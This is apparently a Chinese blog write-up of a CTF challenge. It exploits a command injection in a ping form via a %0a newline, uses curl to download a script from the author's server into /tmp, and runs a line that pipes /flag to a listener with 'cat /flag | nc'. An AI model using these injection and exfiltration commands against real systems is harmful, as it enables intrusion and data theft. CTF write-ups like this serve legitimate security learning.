服务器概心得

最新推荐文章于 2024-01-31 21:33:25 发布
最新推荐文章于 2024-01-31 21:33:25 发布
阅读量620 收藏 2
点赞数 1
文章标签: unctf mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sky_Bird_/article/details/110148837
版权

服务器连接概括心得

1.由题目可知

我们首先要ping一下 ip=xxxxxxxxx
在这里插入图片描述

2.在谷歌浏览器中

在这里插入图片描述

在这里插入图片描述

3.%0a是换行符,换行执行

在这里插入图片描述

题目给出的有严重的过滤。

4.打开我们的服务器

在这里插入图片描述
了解一下
cat命令
cat是Linux的基本文本输出命令,通常用于查看文件内容。
作用:连接多个文件并且打印到屏幕输出,或者重定向到其他文件,也可以用来查看显示单个文件,或者多个文件。

nc命令

nc在ctf一般用来反弹shell 传输文件
(在pwn中用来连接远程服务器运行的程序)

5.在我们的服务器里建一个2.sh文件,里面写着

在这里插入图片描述则:cat /flag | nc 我们服务器的ip 服务器监听端口
这句的意思

意思是c查看根目录下的flag
|命令是执行完前命令后执行后执行后面的命令
nc xx.xx.xxx.xx 5566是把发送到我们服务器监听的端口里

cat /flag | nc 47.93.123.22 5556

6.ip=127.0.0.1%0acurl 47.93.123.227/2.sh > /tmp/521.sh

这个意思是把我们服务器中的2.sh写入到该题中的服务器/tmp/521.sh中在这里插入图片描述
如果服务器中有这个文件则直接写入,否者在该题服务器中/tmp根目录下建立该文件。

7.一般写到/tmp文件夹下

一般写到/tmp文件夹下,因为/tmp文件夹一般权限比较大
其他文件夹可能没有写入的权限,

8.然后打开我们的服务器的端口监听

输入

 nc -lvnp 5666

在这里插入图片描述

9.然后使用运行这个文件

在这里插入图片描述
运行这个文件就是执行/tmp/521.sh
这个就是cat /flag | nc 47.93.123.22 5666

10.到我们的服务器监听端口中去看

在这里插入图片描述

Sky_Bird_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
服务器搭建与维护实验感想,服务器配置实训总结心得
weixin_30845365的博客
08-11 2789
服务器配置实训总结心得 内容精选换一换本文介绍了弹性负载均衡(ELB)各特性版本的功能发布和对应的文档动态,新特性将在各个区域(Region)陆续发布,欢迎体验。由于近年DevOps念的火热,加之DevOps的涵盖面非常广,因此有很多文章和技术都在和DevOps强行关联,使很多想要了解学习DevOps的开发者迷惑不解。其实,DevOps的知识体系如果从顶层上来分解,可大分为2部分:方法论和工具链...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3081
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
linux服务器实训心得体会,linux实训总结与体会
weixin_36125921的博客
04-29 1679
版权声明:以上文章中所选用的图片及文字来源于网络以及用户投稿,由于未联系到知识产权人或未发现有关知识产权的登记,如有知识产权人并不愿意我们使用,如果有侵权请立即联系:55525090@qq.com,我们立即下架或删除。简介:证设备之间的正常通信。 了解拓扑结构图是十分重要的课程, 无论什么样的网络通过总结,人们可以把零散的、肤浅的感性认识上升为系统、深刻的理性认识,从而得出科学的结论,以便改正缺点...
CTF-BUUCTF-Pwn-test_your_nc
qq_42404383的博客
12-19 1万+
CTF-BUUCTF-Pwn-test_your_nc 题目: 解题思路及知识考查: 思路:根据提示,直接NC即可 NC:的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数&g...
pwn-nc题目解析
2201_75327657的博客
03-09 709
利用本身虚拟机自带的nc可直接解出flag。
高性能高并发服务器架构大全
04-01
 谈谈大型高负载网站服务器的优化心得! 8  Lighttpd+Squid+Apache搭建高效率Web服务器 9  浏览量比较大的网站应该从哪几个方面入手? 17  用负载均衡技术建设高负载站点 20  大型网站的架构设计问题 ...
2020-10-29 实验四 进程同步与通信
Aita_ZteP的博客
10-29 2997
实验四 进程同步与通信一、实验目的:二、实验环境:三、实验内容:四、心得体会: 一、实验目的: 1. 掌握基本的同步与互斥算法,理解P,V操作。 2. 理解生产者消费者模型,了解其它典型的同步互斥模型,如哲学家就餐、读者-写者模型等。 3. 学习使用Windows中基本的同步对象,掌握相关API的使用方法。 4. 了解Windows中多线程的并发执行机制,实现进程的同步与互斥。 5. Windows进程间通信的方法有很多,了解其中的典型类型,如命名管道、文件映射等,掌握进程间通信的基本原理。了解w
RocketMQ技术内幕读后感
welcome to 一点点 home
08-18 174
rocketmq
[转]高负载并发网站架构分析
热门推荐
bluehire的专栏
12-23 2万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ——————————————————————————————————————— ? 初创网站与开源软件 6 ? 谈谈大型高负载网站服务器的优化心得! 8 ? Lighttpd+Squid+Apach
接口测试+自动化接口测试详解入门到精通
HB8888888的博客
04-10 4571
1:json模块的使用   字典是一种存储类型,json是一种格式(完全不同)   json.loads()函数是将json字符串转化为字典(dict)   json.dumps()函数是将字典转化为json字符串   json.dump()和json.load()主要用来读写json文件函数 2:接口自动化测试叙   什么是接口测试:   前后端不分离:淘宝网站(响应的数据在页面,访问响应的数据是html的)返回的是一整个html(做接口难,需要解析数据,因为返回的是整个html代码)   前
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5669
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
【Pwn | CTF】BUUCTF test_your_nc1
最新发布
weixin_46301214的博客
01-31 725
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
ctfshow-Crypto-红包4(nc连接)
ZBDX2113的博客
04-30 1317
from secrets import randbelow from nationalsecret import p, r, k, flag g = 2 y = pow(g, k, p) def dododo(): print("Here is my gift for National's Day!") t = pow(g, r, p) print(f't = {t}') print("What do you want?") c = int(input('c =.
项目三 探索并利用漏洞对未知web server权限提升(CTF实战 Kioptrix#2靶机渗透测试)
王先生的蒋小姐的博客
07-20 1452
大家好,我是SuieKa。此是实训项目三,要求根据未知靶机(Kioptrix#2)探索漏洞,并利用漏洞进行权限提升实验项目,希望对朋友们有所帮助。 树一、神器开路,对未知操作系统的全面扫描二、利用探索的漏洞获取shell三、权限提升并获取关键字(hiroshima) 所谓CTF:CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交
ctf解密图片得到flag_CTF之主机渗透系列三
weixin_42355665的博客
12-29 2039
0x00 介绍接着上一篇《CTF之主机渗透系列二》,咱们继续。还是那句话,任何工具使用均来自互联网,涉及到的技术仅用于教学,不得用于非法用途,请遵守国家安全法律法规,做一个正能量的安全人员。试题如下:第一步:我们访问链接:http://202.0.0.23/进入网页首页,通过浏览观察,找到http://202.0.0.23/NewsList.asp?SortID=17 新闻资讯页面,通过get方法...
bugku ctf pwn1 (nc 114.116.54.89 10001)
qq_42777804的博客
06-17 1万+
nc 114.116.54.89 10001 在Linux里面运行 nc 114.116.54.89 10001 ( nc命令用于设置路由器。) 之后用 ls -l 命令 (ls命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。) (-l 除文件名称外,亦将文件型态、权限、拥有者、文件大小等资讯详细列出) 发现flag 使用命令 :...
渗透神器系列】nc
lansefly1990的专栏
12-21 1114
【渗透神器系列】nc 发表于 2017-04-10   |   分类于 安全工具   |   热度 3125 ℃   工欲善其事,必先利其器   从事渗透测试工作几年了,在做项目过程中发现良好的渗透技术固然重要,但欲测试出更多的结果,离不开强大的工具。即使是能力超强的大牛,我想也不可能完全手工做渗透,毕竟渗透测试还是个体力活。   现在有些人认为渗透测试越来越简单了,因为开源的自动化工具...
NetCat(NC)在渗透测试中的常见应用以及中文版参数解释
Hvnt3r的博客
03-21 4154
NetCat简称NC,是一款体积小巧但功能十分强大的网络工具,享有网络工具中的“瑞士军刀”之称,深得网络安全从业者的喜爱,在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法:1.作为文本传输工具2.作为文件的传输工具3.加密传输文件4.加密数据流量5.远程克隆硬盘6.作为木马进行远程控制7.作为流媒体服务器参数中文对照-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!...
CTF指令收集
bouIevard的博客
07-14 993
CTF常用指令 Linux操作 1.给当前用户root权限: sudo su 2.安装软件 sudo apt-get install name 3.运行文件 ./filename 3.获取ip地址 ifconfig 4.查看当前目录下文件 ls 查看权限 ls -alh 5.进入目录 cd path 6.使用ssh文件登录ssh服务 ssh -i sshfilename username@ip 7.修改文件权限 chmod mode filename 其中mode如下: [ugoa][[±
服务器与数据库连接步骤详解
"本文主要介绍了如何实现服务器与数据库的连接,包括通过Apache发布数据库到服务器以及使用Tomcat服务器发布Web项目。" 实现服务器与数据库的连接是任何基于Web的应用程序的基础,这一过程通常分为几个步骤。首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值